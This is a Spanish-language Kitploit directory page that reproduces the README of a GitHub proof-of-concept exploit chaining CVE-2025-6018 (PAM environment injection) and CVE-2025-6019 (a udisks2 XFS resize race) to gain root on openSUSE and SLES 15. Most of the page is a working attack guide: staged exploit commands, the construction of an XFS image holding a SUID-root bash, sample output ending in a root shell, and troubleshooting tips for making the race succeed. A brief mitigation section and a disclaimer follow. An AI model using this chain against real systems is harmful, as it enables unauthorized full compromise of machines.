Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6018-6019 — CVE-2025-6018 CVE-2025-6019 PoC Exploit - Escalada de privilegios local en openSUSE/SUSE Linux Enterprise 15 - bypass de PAM + condición de carrera en udisks2 XFS LPE a root | Kitploit
Herramientas/GitHubGitHub/desertdemons/cve-2025-6018-6019
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónPapers e InvestigaciónAprendizaje y EducaciónExplotación de Binarios
GitHubdesertdemons/cve-2025-6018-6019

CVE-2025-6018-6019

CVE-2025-6018 CVE-2025-6019 PoC Exploit - Escalada de privilegios local en openSUSE/SUSE Linux Enterprise 15 - bypass de PAM + condición de carrera en udisks2 XFS LPE a root

Ver Repositorio
41hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-6018 CVE-2025-6019 PoC Exploit

Escalada Local de Privilegios (LPE) - openSUSE / SUSE Linux Enterprise 15

CVE-2025-6018 CVE-2025-6019 PoC Exploit License

PoC/Exploit funcional para CVE-2025-6018 y CVE-2025-6019 - Escalada de privilegios de un usuario sin privilegios a root en openSUSE Leap 15.x y SUSE Linux Enterprise 15.x

🎯 Resumen Rápido

CVE IDVulnerabilidadImpacto
CVE-2025-6018Inyección de Variables de Entorno en PAMBypass al estado allow_active de polkit
CVE-2025-6019Condición de Carrera en XFS Resize de udisks2/libblockdevShell root

Cadena de Ataque

root@kitploit:~
Unprivileged SSH User → [CVE-2025-6018] → allow_active → [CVE-2025-6019] → ROOT

🔥 Demo del PoC

root@kitploit:~
# Check vulnerability
./exploit.sh --check

# Setup PAM bypass (CVE-2025-6018)
./exploit.sh --setup

# Reconnect SSH, then: su - $USER

# Exploit (CVE-2025-6019)
./exploit.sh --exploit /tmp/xfs.img

# Result: ROOT SHELL
uid=1000(user) gid=1000(user) euid=0(root)

📥 Instalación

root@kitploit:~
git clone https://github.com/DesertDemons/CVE-2025-6018-6019.git
cd CVE-2025-6018-6019
chmod +x *.sh

🎯 Sistemas Afectados

  • ✅ openSUSE Leap 15.0, 15.1, 15.2, 15.3, 15.4, 15.5, 15.6
  • ✅ SUSE Linux Enterprise Server (SLES) 15 SP1-SP6
  • ✅ SUSE Linux Enterprise Desktop (SLED) 15 SP1-SP6

⚠️ Nota: openSUSE Leap 15.6 llega a su fin de vida el 30 de abril de 2026. Después de esta fecha, no se publicarán parches de seguridad. Los usuarios deben migrar a Leap 16.0 o a SLES con soporte extendido.

Componentes Vulnerables

  • PAM (Linux-PAM 1.3.0 - 1.6.0) con user_readenv=1
  • udisks2 2.9.x con libblockdev
  • polkit con allow_active: yes para acciones de udisks2

📖 Uso

Opción 1: Comprobar la Vulnerabilidad

root@kitploit:~
./exploit.sh --check

Opción 2: Configurar el Bypass de PAM (CVE-2025-6018)

root@kitploit:~
./exploit.sh --setup
# Then: exit SSH, reconnect, run: su - $USER

Opción 3: Explotar (CVE-2025-6019)

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

Opción 4: Modo Automático Completo

root@kitploit:~
./exploit.sh --auto /tmp/xfs.img

Opción 5: Mostrar las Instrucciones de Creación de la Imagen

root@kitploit:~
./exploit.sh --create-image

🛠️ Creación de la Imagen de Payload XFS

Ejecutar en la máquina ATACANTE como root:

⚠️ DEBES usar el binario /usr/bin/bash de la víctima, no uno local. Un binario de bash de una distro diferente (Kali, Arch, Ubuntu, etc.) fallará en el objetivo debido a la incompatibilidad de ABI de glibc/bibliotecas compartidas, incluso en la misma arquitectura x86_64.

Usar el script auxiliar (recomendado)

El script detecta automáticamente tu versión de xfsprogs y aplica las opciones correctas:

root@kitploit:~
# Get victim's bash first
scp user@target:/usr/bin/bash /tmp/victim_bash

# Create image (auto-detects safe mkfs flags)
sudo ./create_image.sh /tmp/victim_bash xfs.img

# For SUSE 15 SP1-SP4 targets (kernel < 5.14), use compatibility mode:
sudo ./create_image.sh --compat /tmp/victim_bash xfs.img

Creación manual

root@kitploit:~
sudo su -

# 1. Get victim's bash binary
scp user@target:/usr/bin/bash /tmp/bash

# 2. Create 300MB XFS image with safe flags
dd if=/dev/zero of=xfs.img bs=1M count=300
mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img

# 3. Mount with SUID support
mkdir -p /tmp/mnt
mount -o loop,suid xfs.img /tmp/mnt

# 4. Copy victim's bash and set SUID bit
cp /tmp/bash /tmp/mnt/xpl
chmod 4755 /tmp/mnt/xpl
chown root:root /tmp/mnt/xpl
ls -la /tmp/mnt/xpl  # MUST show: -rwsr-xr-x

# 5. Unmount and transfer
umount /tmp/mnt
scp xfs.img user@target:/tmp/

Compatibilidad del formato XFS

La imagen XFS debe formatearse con opciones compatibles con el kernel del objetivo. Las versiones más recientes de xfsprogs habilitan por defecto funciones en disco que los kernels SUSE más antiguos no pueden leer, lo que provoca errores de wrong fs type, bad superblock durante el montaje de redimensionado de udisks2.

DestinoKernelComando mkfs.xfs
SUSE 15 SP5-SP65.14 / 6.4mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img
SUSE 15 SP1-SP44.12 - 5.3mkfs.xfs -f -m crc=0,reflink=0 xfs.img

¿Por qué? exchange y parent son funciones del kernel 6.10+ (activadas por defecto en xfsprogs 6.x). bigtime, inobtcount y nrext64 son funciones del kernel 5.10+. El comando "compat" de SP1-SP4 (-m crc=0,reflink=0) crea un formato XFS V4 con todas las funciones modernas deshabilitadas, que funciona en todos los SP de SUSE 15.

🔬 Detalles Técnicos

CVE-2025-6018: Inyección de Variables de Entorno en PAM

Vulnerabilidad: El módulo pam_env de PAM lee ~/.pam_environment con user_readenv=1 (valor predeterminado en SUSE), lo que permite la inyección de variables de entorno.

Explotación: Establece XDG_SEAT=seat0 y XDG_VTNR=1 para engañar a systemd-logind y conseguir que otorgue privilegios polkit allow_active.

root@kitploit:~
# ~/.pam_environment
XDG_SEAT=seat0
XDG_VTNR=1

CVE-2025-6019: Condición de Carrera en el Redimensionado de XFS

Vulnerabilidad: Al redimensionar el sistema de archivos XFS a través de udisks2, libblockdev monta temporalmente el sistema de archivos sin la bandera nosuid.

Explotación:

  1. Crear una imagen XFS con un binario SUID root
  2. Configurar el dispositivo loop
  3. Activar el redimensionado a través de D-Bus
  4. Competir por ejecutar el binario SUID durante el montaje temporal
  5. Obtener una shell root

📋 Guía Completa de Explotación

Paso 1: Comprobar la Vulnerabilidad

root@kitploit:~
./exploit.sh --check

Salida:

root@kitploit:~
[+] pam_env.so found in PAM configuration
[+] pam_systemd.so found - escalation vector available
[+] Target OS is vulnerable (openSUSE/SLES)
[-] allow_active status: NO

Paso 2: Configurar el Bypass de PAM

root@kitploit:~
./exploit.sh --setup
exit
ssh user@target
su - $USER

Paso 3: Verificar allow_active

root@kitploit:~
./exploit.sh --check

Salida:

root@kitploit:~
[+] allow_active status: YES
    You have allow_active privileges!

Paso 4: Transferir la Imagen XFS

root@kitploit:~
# On attacker:
scp xfs.img user@target:/tmp/

Paso 5: Explotar

root@kitploit:~
./exploit.sh --exploit /tmp/xfs.img

Salida:

root@kitploit:~
[+] Loop device created: /dev/loop0
[+] Loop device verified as XFS
[*] Starting race condition loop...
[*] Triggering XFS resize on loop0...

=== ROOT SHELL OBTAINED ===
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user)

root@target#

🔧 Solución de Problemas

🛡️ Mitigación

Solución Inmediata

root@kitploit:~
# Disable user_readenv in PAM
sed -i 's/user_readenv=1/user_readenv=0/g' /etc/pam.d/common-auth

# Or restrict udisks2 polkit policy
# Change allow_active from "yes" to "auth_admin"

Parches del Proveedor

  • Actualiza los paquetes de PAM, udisks2 y libblockdev
  • Consulta los avisos de seguridad de SUSE

📚 Referencias

  • Aviso de Seguridad de Qualys
  • Informe Técnico de Qualys
  • SUSE CVE-2025-6018
  • SUSE CVE-2025-6019
  • NVD CVE-2025-6018
  • NVD CVE-2025-6019

🏆 Créditos

  • Qualys Threat Research Unit - Descubrimiento original de la vulnerabilidad
  • DesertDemons - Desarrollo del exploit PoC
  • Jazzruran - Informe y corrección del error de incompatibilidad de versión de xfsprogs (#1)

⚠️ Descargo de Responsabilidad

Esta herramienta es únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Los autores no se hacen responsables de ningún uso indebido.

📄 Licencia

MIT License


🔍 Palabras Clave

CVE-2025-6018 CVE-2025-6019 PoC Proof of Concept Exploit Privilege Escalation LPE Local Privilege Escalation Root openSUSE SUSE SLES PAM pam_env udisks2 libblockdev


⭐ ¡Dale una estrella a este repositorio si te ayudó! ⭐

Descargar herramienta
ProblemaCausaSolución
allow_active: NOEl bypass de PAM no está activoEjecuta --setup, sal de SSH, reconéctate y ejecuta su - $USER
Image is not XFSFormato de sistema de archivos incorrectoUsa mkfs.xfs, no mkfs.ext4
SUID not workingPermisos no establecidosVerifica los permisos -rwsr-xr-x en la máquina atacante
Race condition missedProblema de sincronizaciónEjecuta el exploit de nuevo (normalmente funciona en 1-3 intentos)
Segfault del binario SUID o GLIBC_x.xx not foundBinario de bash de la distro equivocada (incompatibilidad de glibc/ABI)Usa el binario /usr/bin/bash de la víctima mediante scp, no tu bash local
Resize output: Error resizing filesystem on /dev/loopN: Failed to mount '/dev/loopN' before resizing it: wrong fs type, bad option, bad superblock on /dev/loopN, missing codepage or helper program, or other errorImagen XFS formateada con funciones que el kernel del objetivo no puede leer (incompatibilidad de versión de xfsprogs)Crea la imagen con mkfs.xfs -f -i exchange=0 -n parent=0 xfs.img para SP5/SP6, o con mkfs.xfs -f -m crc=0,reflink=0 xfs.img para SP1-SP4
XFS
Race Condition
Security
Vulnerability
Pentest